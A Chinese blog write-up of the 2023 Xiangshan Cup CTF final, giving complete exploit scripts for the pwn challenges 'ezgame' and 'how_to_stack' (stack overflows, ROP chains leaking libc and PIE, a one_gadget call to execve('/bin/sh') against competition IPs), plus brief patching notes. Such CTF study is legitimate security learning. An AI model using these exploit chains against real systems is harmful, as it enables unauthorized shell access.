首页 > 其他分享 >香山杯决赛2023.11.19

香山杯决赛2023.11.19

时间:2023-11-19 16:33:05浏览次数:34  
标签:p64 19 rdi 2023.11 datab 香山 NULL data sla

香山杯决赛

附件如下。
https://files.cnblogs.com/files/blogs/798207/xsb2023_final.tar.gz?t=1700382211&download=true
2023.11.19 广东中山
回家了两天,见了高中同学,晚上还去中大玩一下,明天回青岛。

孤胆英雄,归途远征。以一敌百,天下无双。

ezgame

攻击

有栈溢出漏洞,直接打游戏打到能打大boss溢出即可。

#!python
from evilblade import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

setup('./pwn2')
libset('./libc-2.31.so')
evgdb()
rsetup('39.106.48.123', 31448)

puts = pltadd('puts')
putsg = gotadd('puts')
rdi = 0x0000000000401a3b# pop rdi ; ret
for i in range(50):
    sla('>',b'2')
    sla('?',b'1')

sla('>',b'6')
sla('>',b'1')
sla('>',b'1')
sla('>',b'1')
sla('>',b'1')
sla('>',b'1')
sla('>',b'1')
sla('>',b'1')
sla('>',b'2')
sla('>',b'2')
sla('>',b'2')
sla('>',b'2')
sla('>',b'2')
sla('>',b'2')
sla('>',b'2')
sla('>',b'3')
sla('>',b'2')
sla('?',b'2')
sla('name',b'a'*0x658+p64(rdi)+p64(putsg)+p64(puts)+p64(0x4011d2))

ret = 0x0000000000401016 # ret
addx = tet()
addx = getx64(0,-1)
base = getbase(addx,'puts')
dpx('base',base)
sys = symoff('system',base)
sh  = base+0x00000000001b45bd
pause()
sla('>',b'2')
sla('?',b'2')
#sla('name',b'a'*0x658+p64(rdi)+p64(sh)+p64(ret)*2+p64(sys))
sla('name',b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaafdaaaaaafeaaaaaaffaaaaaafgaaaaaafhaaaaaafiaaaaaafjaaaaaafkaaaaaaflaaaaaafmaaaaaafnaaaaaafoaaaaaafpaaaaaafqaaaaaafraaaaaafsaaaaaaftaaaaaafuaaaaaafvaaaaaafwaaaaaafxaaaaaafyaaaaaafzaaaaaagbaaaaaagcaaaaaagdaaaaaageaaaaaagfaaaaaaggaaaaaaghaaaaaagiaaaaaagjaaaaaagkaaaaaaglaaaaaagmaaaaaagnaaaaaagoaaaaaagpaaaaaagqaaaaaagraaaaaagsaaaaaagtaaaaaaguaaaaaagvaaaaaagwaaaaaagxaaaaaagyaaaaaagzaaaaaahbaaaaaahcaaaaaahdaaaaaaheaaaaaahfaaaaaahgaaaaaahhaaaaaahiaaaaaahjaaaaaahkaaaaaahlaaaaaahmaaaaaahnaaaaaahoaaaaaahpaaaaaahqaaaaaahraaaaaahsaaaaaahtaaaaaahuaaaaaahvaaaaaahwaaaaaahxaaaaaahyaaaaaahzaaaaaaibaaaaaaicaaaaaai'+p64(rdi)+p64(sh)+p64(ret)+p64(sys))

dpx('base',base)

ia()

防御

由于存在栈溢出漏洞,添加相应防护即可。我是添加了限制execve的使用。

how_to_stack

攻击

赛后三分钟做出来的,有些可惜,不过一起写上来吧。

利用解密加密的方式,打入-1无需加密,泄露栈上内存,并且栈上内存可以指定,先泄露stack再泄露pie,打ret2os。

所以真的要非常在意栈上控制的临时变量!!!控制临时变量可以控制很多啊 !!!!!!

#!python
from evilblade import *

context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')

setup('./pwn2')
libset('./libc.so.6')
evgdb()
rsetup('47.94.85.181', 41463)

rdi = 0x0000000000401a3b# pop rdi ; ret

sl(b'1')
sl(b'-1')
sa('Data',b'a'*0x67)
ru('hex: ')
data = ru('\n')[:-1].decode()
dp('data',data)
data = data.split(' ')
dp('data',data)
datab = b''
for i in data:
    datab += p8(int(i,16))
dp('datab len',len(datab))
dp('datab',(datab))
pay = datab
datab = uu64(datab[-6:])
dpx('datab',(datab))
stack = datab

sl(b'0')
sl(b'-1')
pay = b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'+p64(stack-0x70)
sa('Data',pay+p64(stack-0x100))
print(len(pay))
print((pay))

ru('hex: ')
data = ru('\n')[:-1].decode()
dp('data',data)
data = data.split(' ')
dp('data',data)
datab = b''
for i in data:
    datab += p8(int(i,16))
dp('datab len',len(datab))
dp('datab',(datab))

datab = uu64(datab[-6:])
pie = datab-6309
dpx('datab',(pie))
rdi = 0x00000000000019d3+pie #pop rdi ; ret
ret = 0x000000000000101a+pie #ret
puts = pltadd('puts')+pie
putsg = gotadd('puts')+pie
ru(':')
sl(b'0')
sl(b'-1')
pay = b'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'+p64(stack)
sa('Data',pay+p64(stack-0x60)+p64(rdi)+p64(putsg)+p64(puts)+p64(pie+0x16af))
ru('\n')
ru('\n')
libc = getx64(0,-1)
base = getbase(libc,'puts')
os = base+0xe3b01
sl(b'-1')
sa('Data',pay+b'\0\0'+p64(stack)[:-2]+p64(os))
ia()
'''
constraints:
  [r15] == NULL || r15 == NULL
  [r12] == NULL || r12 == NULL

0xe3b01 execve("/bin/sh", r15, rdx)
constraints:
  [r15] == NULL || r15 == NULL
  [rdx] == NULL || rdx == NULL

0xe3b04 execve("/bin/sh", rsi, rdx)
constraints:
  [rsi] == NULL || rsi == NULL
  [rdx] == NULL || rdx == NULL
'''

防御

这题有

result = nbytes;
  if ( (_DWORD)nbytes )
  {
    memset(s, 0, 0x60uLL);
    printf("Data: ");
    read(0, s,nbytes );

把nbytes改为0x60即可防止溢出。

camera

防御

由于打堆都需要泄露,函数里的printf不安全,会泄露libc地址,把他换成程序自带的安全打印即可。

__int64 __fastcall sub_1768(const char *a1)
{
  int v2; // [rsp+1Ch] [rbp-4h]

  v2 = strlen(a1);
  write(1, a1, v2);
  return 1LL;
}

把call print改为call上面这个。

标签:p64,19,rdi,2023.11,datab,香山,NULL,data,sla
From: https://www.cnblogs.com/9man/p/17842215.html

相关文章

  • 11.19
    几天在GitHub上查找了erp的系统,但在使用时遇到下面这个问题Causedby:java.lang.NullPointerException:Cannotinvoke"java.util.Map.get(Object)"because"this.serverVariables"isnull atcom.mysql.jdbc.ConnectionImpl.getServerCharset(ConnectionImpl.java:3299) a......
  • The 2019 ICPC Asia Yinchuan Regional Contest
    Preface好久没有一场比赛做出两位数以上的题了,评价是写代码写得好爽感觉这种时间比较古早的场的拿奖难度和现在比起来低好多的说,这场在现场如果有10题都能捧个亚军的杯了但感觉主要是我们J题最后5分钟乱搞了个做法过了样例交上去就直接过了,后面看了其它人的做法好像和我们的都......
  • 2023-11-19 无法将“gradle”项识别为 cmdlet、函数、脚本文件或可运行程序的名称。(wi
    系统环境:windows出现该提示,一般情况下都是因为你没有把你安装的gradle包路径放到系统变量如果你没有安装gradle,可以前往gradle官网下载:https://gradle.org/install如果你已经安装了gradle,那下面就是把gradle包路径放到系统变量的教程: 系统变量==》Path==》新建 输入gradl......
  • 2023-2024-1 20231419 《计算机基础与程序设计》第八周学习总结
    2023-2024-120231419《计算机基础与程序设计》第八周学习总结作业信息这个作业属于哪个课程https://edu.cnblogs.com/campus/besti/2023-2024-1-CFAP这个作业要求在哪里https://www.cnblogs.com/rocedu/p/9577842.html#WEEK08这个作业的目标自学《计算机科学概......
  • oracle19cPDB数据库连不上,提示ORA-01109: database not open
    今天尝试创建了一个RAC环境的PDB数据库,在本地执行alterpluggabledatabasepdb01open成功了,但是使用上去了plus连接还是连接不上,提示错误如下:C:\Users\Administrator>sqlplussystem/[email protected]:1521/pdb01SQL*Plus:Release19.0.0.0.0-Productionon星期日1......
  • AT_gigacode_2019_b 题解
    本题考查基本语法。思路用while来枚举每一组数据,用if判断是否合法。在判断时需要使用逻辑运算符&&,它的意思是左右两个要求如果同时成立,则会返回true,否则返回false。\(a\gex\),\(b\gey\),\(a+b\gez\)。这三个条件都要同时成立,所以可以使用&&。ACCODE#include......
  • 11.19日记
    今天继续进行文件的上传与下载经过不懈努力,最终实践得出,下载的时候必须给访问通行自定义注解@AuthAccess@Target({ElementType.METHOD})@Retention(RetentionPolicy.RUNTIME)@Documentedpublic@interfaceAuthAccess{}最后解决了问题......
  • 解密Prompt系列19. LLM Agent之数据分析领域的应用:Data-Copilot & InsightPilot
    在之前的LLMAgent+DB的章节我们已经谈论过如何使用大模型接入数据库并获取数据,这一章我们聊聊大模型代理在数据分析领域的应用。数据分析主要是指在获取数据之后的数据清洗,数据处理,数据建模,数据洞察和数据可视化的步骤。可以为经常和数据打交道,但是并不需要太过艰深的数据分析......
  • misc 2023.11.13-11.19
    1.a.将其拖入010中,发现有一串二进制b.我们考虑是不是什么解密,将二进制转换为16进制再转为asciic.得到flag{koekj3s} 2.a.暴力破解,解压文件b.解密之后发现一个奇怪的玩意,经过资料搜索,这是brainfuck代码c.使用解密工具: 3.a.用wireshark打开文件,过滤出HTTP数据包......
  • [SUCTF 2019]CheckIn
    有上传文件的按钮,猜测是上传漏洞上传php不行,.php3,.php5,.phtml等都不行改成jpg,检测到了内容<?不通过,那就再换一种方式<scriptlanguage='php'>assert($_REQUEST['cmd'])</script>检测到文件不是图像,很明显是用exif_imagetype()函数,函数功能是读取一个图像的第一个字节并检......